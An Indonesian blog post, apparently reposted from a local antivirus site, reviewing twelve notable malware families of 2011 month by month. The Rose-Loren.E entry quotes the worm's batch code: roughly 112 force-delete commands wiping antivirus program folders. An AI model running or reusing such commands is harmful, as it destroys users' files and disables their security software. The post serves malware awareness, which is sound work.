Ayo Gabung Segera Di JBP Terbaru

Sabtu, 07 Januari 2012

Review 12 Malware 2011

Tidak terasa sudah mendekati akhir tahun 2011. Berakhirnya tahun 2011 seakan tidak mempengaruhi eksistensi penyebaran malware baru, maupun varian baru dari malware yang sudah dikenali. Mereka menyebar antara lain melalui shortcut, autorun, removable disk, koneksi jaringan dan internet. Beberapa malware bahkan hangat dibahas selama berbulan-bulan antara lain Stuxnet dan Ramnit. Ditambah lagi dengan pendatang baru NgrBot yang  mencuri setiap akun user yang di infeksinya, dan mungkin bisa dikatakan, bahwa 2011 masih merupakan tahun keemasan bagi NgrBot.

Berikut ini adalah 10 malware yang pernah di review sebelumnya dan cukup menarik untuk dibahas karena memiliki kemampuan payload atau aksi tertentu.

1. Delp-Shortcut (Januari)


Sempat banyak dilaporkan di akhir tahun 2010 sampai akhir januari 2011. Ciri utamanya adalah membuat 5 buah shortcut dengan nama seperti:
- Documment and Settings.lnk
- Program Files. lnk
- RECYCLER.lnk
- System Volume Information.lnk
- WINDOWS.lnk
Hostnya bernama mso.sys dan sebenarnya adalah file DLL (Dynamic Link Library). Delp-Shortcut seringkali membuat crash Explorer dan shortcut yang dibuatnya sama seperti shortcut Ramnit atau Stuxnet yang memiliki kemampuan untuk mengeksekusi secara otomatis setelah terhubung dengan komputer tanpa sepengetahuan user (shortcut exploit).

2. Rose-Loren.E (Februari)

Worm lokal yang merupakan hasil modifikasi varian sebelumnya ini tetap menunjukan kesan “Asli Indonesia”. Pesan berupa gambar dan puisi ini sangat menarik untuk diliat. Meski begitu, tetap saja worm ini termasuk worm yang sangat berbahaya. Karena selain bersifat menyebar dan memberikan pesan-pesan dari virus maker-nya, Rose-Loren.E juga akan menghapus seluruh file milik antivirus luar seperti yang terlihat pada source code salah satu companion dari Rose-Loren.E.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
del /f /q /s  C:\ESET\*.* >nul
del /f /q /s  C:\antivi~1\*.* >nul
del /f /q /s  C:\antivi~2\*.* >nul
del /f /q /s  C:\antiviru\*.* >nul
del /f /q /s  C:\avg\*.* >nul
del /f /q /s  C:\kasper~1\*.* >nul
del /f /q /s  C:\kasper~2\*.* >nul
del /f /q /s  C:\mcafee\*.* >nul
del /f /q /s  C:\mcafee.com\agent\*.* >nul
del /f /q /s  C:\mcafee.com\*.* >nul
del /f /q /s  C:\mcafee.com\VSO\*.* >nul
del /f /q /s  C:\mcafee~1\*.* >nul
del /f /q /s  C:\msav\*.* >nul
del /f /q /s  C:\norman\*.* >nul
del /f /q /s  C:\norton~1\*.* >nul
del /f /q /s  C:\norton~2\*.* >nul
del /f /q /s  C:\pav\*.* >nul
del /f /q /s  C:\pccill~1\*.* >nul
del /f /q /s  C:\iolo\*.* >nul
del /f /q /s  C:\progra~1\ESET\*.* >nul
del /f /q /s  C:\progra~1\antivi~1\*.* >nul
del /f /q /s  C:\progra~1\antivi~2\*.* >nul
del /f /q /s  C:\progra~1\avg\*.* >nul
del /f /q /s  C:\progra~1\kasper~1\*.* >nul
del /f /q /s  C:\progra~1\kasper~2\*.* >nul
del /f /q /s  C:\progra~1\mcafee\*.* >nul
del /f /q /s  C:\progra~1\McAfee.com\agent\*.* >nul
del /f /q /s  C:\progra~1\McAfee.com\\*.* >nul
del /f /q /s  C:\progra~1\McAfee.com\VSO\*.* >nul
del /f /q /s  C:\progra~1\mcafee~1\*.* >nul
del /f /q /s  C:\progra~1\mindso~1\*.* >nul
del /f /q /s  C:\progra~1\norman\*.* >nul
del /f /q /s  C:\progra~1\norton~1\*.* >nul
del /f /q /s  C:\progra~1\norton~2\*.* >nul
del /f /q /s  C:\progra~1\pandas~1\*.* >nul
del /f /q /s  C:\Progra~1\Alwils~1\*.* >nul
del /f /q /s  C:\progra~1\iolo\*.* >nul
del /f /q /s /a:h  C:\ESET\*.* >nul
del /f /q /s /a:h  C:\antivi~1\*.* >nul
del /f /q /s /a:h  C:\antivi~2\*.* >nul
del /f /q /s /a:h  C:\antiviru\*.* >nul
del /f /q /s /a:h  C:\avg\*.* >nul
del /f /q /s /a:h  C:\kasper~1\*.* >nul
del /f /q /s /a:h  C:\kasper~2\*.* >nul
del /f /q /s /a:h  C:\mcafee\*.* >nul
del /f /q /s /a:h  C:\mcafee.com\agent\*.* >nul
del /f /q /s /a:h  C:\mcafee.com\VSO\*.* >nul
del /f /q /s /a:h  C:\mcafee~1\*.* >nul
del /f /q /s /a:h  C:\msav\*.* >nul
del /f /q /s /a:h  C:\norman\*.* >nul
del /f /q /s /a:h  C:\norton~1\*.* >nul
del /f /q /s /a:h  C:\norton~2\*.* >nul
del /f /q /s /a:h  C:\pav\*.* >nul
del /f /q /s /a:h  C:\pccill~1\*.* >nul
del /f /q /s /a:h  C:\pc-cil~1\*.* >nul
del /f /q /s /a:h  C:\iolo\*.* >nul
del /f /q /s /a:h  C:\progra~1\ESET\*.* >nul
del /f /q /s /a:h  C:\progra~1\antivi~1\*.* >nul
del /f /q /s /a:h  C:\progra~1\antivi~2\*.* >nul
del /f /q /s /a:h  C:\progra~1\avg\*.* >nul
del /f /q /s /a:h  C:\progra~1\kasper~1\*.* >nul
del /f /q /s /a:h  C:\progra~1\kasper~2\*.* >nul
del /f /q /s /a:h  C:\progra~1\mcafee\*.* >nul
del /f /q /s /a:h  C:\progra~1\mcafee.com\agent\*.* >nul
del /f /q /s /a:h  C:\progra~1\mcafee.com\*.* >nul
del /f /q /s /a:h  C:\progra~1\mcafee.com\VSO\*.* >nul
del /f /q /s /a:h  C:\progra~1\mcafee~1\*.* >nul
del /f /q /s /a:h  C:\progra~1\mindso~1\*.* >nul
del /f /q /s /a:h  C:\progra~1\norman\*.* >nul
del /f /q /s /a:h  C:\progra~1\norton~1\*.* >nul
del /f /q /s /a:h  C:\progra~1\norton~2\*.* >nul
del /f /q /s /a:h  C:\progra~1\pandas~1\*.* >nul
del /f /q /s /a:h  C:\Progra~1\Alwils~1\*.* >nul
del /f /q /s /a:h  C:\progra~1\iolo\*.* >nul
del /f /q /s /a:R  C:\ESET\*.* >nul
del /f /q /s /a:R  C:\antivi~1\*.* >nul
del /f /q /s /a:R  C:\antivi~2\*.* >nul
del /f /q /s /a:R  C:\antiviru\*.* >nul
del /f /q /s /a:R  C:\avg\*.* >nul
del /f /q /s /a:R  C:\kasper~1\*.* >nul
del /f /q /s /a:R  C:\kasper~2\*.* >nul
del /f /q /s /a:R  C:\mcafee\*.* >nul
del /f /q /s /a:R  C:\mcafee.com\agent\*.* >nul
del /f /q /s /a:R  C:\mcafee.com\*.* >nul
del /f /q /s /a:R  C:\mcafee.com\VSO\*.* >nul
del /f /q /s /a:R  C:\mcafee~1\*.* >nul
del /f /q /s /a:R  C:\msav\*.* >nul
del /f /q /s /a:R  C:\norman\*.* >nul
del /f /q /s /a:R  C:\norton~1\*.* >nul
del /f /q /s /a:R  C:\norton~2\*.* >nul
del /f /q /s /a:R  C:\pav\*.* >nul
del /f /q /s /a:R  C:\pccill~1\*.* >nul
del /f /q /s /a:R  C:\pc-cil~1\*.* >nul
del /f /q /s /a:R  C:\iolo\*.* >nul
del /f /q /s /a:R  C:\progra~1\ESET\*.* >nul
del /f /q /s /a:R  C:\progra~1\antivi~1\*.* >nul
del /f /q /s /a:R  C:\progra~1\antivi~2\*.* >nul
del /f /q /s /a:R  C:\progra~1\avg\*.* >nul
del /f /q /s /a:R  C:\progra~1\kasper~1\*.* >nul
del /f /q /s /a:R  C:\progra~1\kasper~2\*.* >nul
del /f /q /s /a:R  C:\progra~1\mcafee\*.* >nul
del /f /q /s /a:R  C:\progra~1\mcafee.com\*.* >nul
del /f /q /s /a:R  C:\progra~1\mcafee.com\agent\*.* >nul
del /f /q /s /a:R  C:\progra~1\mcafee.com\VSO\*.* >nul
del /f /q /s /a:R  C:\progra~1\mcafee~1\*.* >nul
del /f /q /s /a:R  C:\progra~1\mindso~1\*.* >nul
del /f /q /s /a:R  C:\progra~1\norman\*.* >nul
del /f /q /s /a:R  C:\progra~1\norton~1\*.* >nul
del /f /q /s /a:R  C:\progra~1\norton~2\*.* >nul
del /f /q /s /a:R  C:\progra~1\pandas~1\*.* >nul
del /f /q /s /a:R  C:\Progra~1\Alwils~1\*.* >nul
del /f /q /s /a:R  C:\progra~1\iolo\*.* >nul

3. SystemTools (Maret)

Mengingatkan kita pada website resmi salah satu antivirus lokal yang disisipkan oleh antivirus palsu. Dan menariknya, antivirus palsu ini mirip seperti worm lokal yang meninggalkan pesan akan kehadirannya. Sebenarnya tidak sulit dalam menghadapi malware tipe trojan ini, SystemTools hanya memfokuskan payload untuk mendisable proses yang namanya tidak tidak seperti proses aplikasi pada Windows.

4. FakeAV-Downloader.K (April)

Lagi-lagi antivirus palsu yang menyerang user. Kali ini menyebar lewat email dari website yang mungkin sudah dikuasai pihak lain selain pemilik aslinya. Dan dengan sengaja mengirimkan sebuah pesan email ke setiap user secara acak yang isinya terlampir sebuah file antivirus palsu. Dan parahnya, layaknya antivirus palsu yang umumnya mengharuskan user membayar sejumlah uang dengan nilai nominal yang cukup tinggi untuk mendapatkan aktifasi serial number antivirus palsu tersebut. Dan kenyataannya, tidak ada jaminan bahwa setelah user membayarkan nominal yang tertera pada websitenya, komputer yang terinfeksi antivirus palsu tersebut akan kembali normal.

5. FontPorn (Mei)

Sosial Engeneering adalah konsep yang tepat untuk menggambarkan teknik FontPorn untuk menginfeksi komputer user. Banyak dikeluhkan user yang katanya ada shortcut porno di flash disknya. Karena memang setelah aktif di memory, FontPorn akan membuat beberapa file seperti:
1. autorun.inf
2. pornmovs.lnk (icon folder)
3. myporno.avi.lnk (icon file video)
4. setup50045.lnk (icon shortcut)
5. setup50045.fon (host dengan icon font file)
Selain bersifat worm, FontPorn juga melakukan koneksi ke website yang berasal dari Ukraina. Meski demikian, belum tentu FontPorn berasal dari Ukraina.

6. Serviks.I (Juni)

Salah satu varian worm Serviks buatan Serviks Maker adalah Serviks.I. Mencari setiap file dokumen HTML dan PHP yang terdapat pada drive kemudian dihapus dan digantingan dengan dokumen baru yang berisi pesan dari Serviks Maker. Namun setelah dilihat lebih jauh, worm Serviks.I kali ini hanyalah hasil modifikasi dari worm Aksika yang memang source codenya disebarluaskan.

7. Proklamasi (Juli)

Menjelang perayaan 17 Agustus 2011, ada saja virus maker yang membuat perayaan dengan cara sendiri. Teks Proklamasi yang biasanya dibacakan saat prosesi upacara bendera setiap tanggal 17 agustus ini, dibuat sedikit berbeda oleh worm Proklamasi. Melalui pesan pada file HTML-nya, kita dapat melihat teks proklamasi. Meski belum banyak laporan akan menyebarnya worm ini, tetap saja termasuk worm yang berbahaya.

8. NgrBot (Agustus)

Ini dia, sang pencuri ulung dengan kemampuan bersembunyi yang mampu disiapkan seseorang secara sengaja untuk mencuri akun milik user yang diinfeksinya. Worm tipe trojan ini memang sengaja dibuat untuk kepentingan pribadi dan mendapatkan keuntungan sebesar-besarnya dari hasil infeksi setiap komputer yang terkoneksi dengan internet. Belakangan ini dilaporkan juga bahwa NgrBot banyak menyebar melalui chat pada Facebook.

9. None (September)

Ukurannya 2MB, padahal source aslinya hanya berukuran 55.1 KB dan None adalah worm yang berasal dari Indonesia. Social Engineering merupakan media utama worm ini dalam menyebar. Dengan nama “cara_menghapus_virus_win32_ramnit_sality.rar” seolah akan meyakinkan user untuk melihat dokumen asli dari file archive tersebut. Di dalam pesan dari worm None, disisipkan sebuah URL yang mengarah kepada situs porno. Worm ini semakin terlihat sangat istimewa dengan bergeraknya start menu dan bergeraknya cursor dengan sendirinya secara acak yang akan membuat user kesulitan dalam mengendalikan komputer yang sudah terinfeksi worm ini.

10. AryaN (Oktober)

Masih dengan shortcut, AryaN melakukan sedikit modifikasi pada teknik membuat shortcutnya. Umumnya, setelah malware membuat shortcut pada flash disk menggunakan nama dari file atau folder, kemudia file atau folder tersebut di-hidden. Sedangkan AryaN, tidak meng-hidden file atau foldernya, tetapi membackup file tersebut kedalam sebuah folder yang dibuat oleh AryaN. Dan setiap shortcut yang dihasilkan, memiliki icon yang sama seperti file aslinya. Sehingga, bagi user yang lengah sudah tentu akan mengaktifkan malware yang dipanggil melalui shortcut.

11. BlackLabel (November)

Diawali dengan website yang seolah akan menunjukan konten porno, kemudian user akan diarahkan kesebuah halaman website dan mendapat peringatan bahwa komputernya terinfeksi virus. Setelah itu secara otomatis user mendownload sebuah file, begitulah teknik yang digunakan BlackLabel. Setelah aktif di memory, BlackLabel akan mendownload file varian lainnya.

12. Alice (Desember)

Penutup malware di 2011 ini adalah worm tipe VBS yang juga menginfeksi file HTML atau HTM. Bukan hanya menginfeksi file, Alice juga memiliki keunikan lain dimana hampir seluruh tubuhnya di-encode. Dengan tubuh yang berisi source code acak, Alice termasuk worm yang berhasil meloloskan diri dari beberapa antivirus luar termasuk lokal. Worm sederhana yang akan membuat jengkel beberapa user karena ditemukan adanyak ketidak wajaran dari file document Microsoft Word. Wajar saja, setiap dokumen dengan tipe *.doc, *.docx dan *.rtf.
Dari beberapa malware yang sudah di jelaskan di atas, terdapat juga malware yang masih banyak menyebar seperti Sality, Alman, Virut, Conficker. Dengan adanya teknik encode seperti Alice, besar kemungkinan di tahun 2012 nanti akan ada malware tipe vbs yang menggunakan teknik encode seperti Alice. Dan teror NgrBot, akan sepertinya akan terus berlanjut.(http://virusindonesia.com)

0 komentar:

Poskan Komentar

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | cheap international calls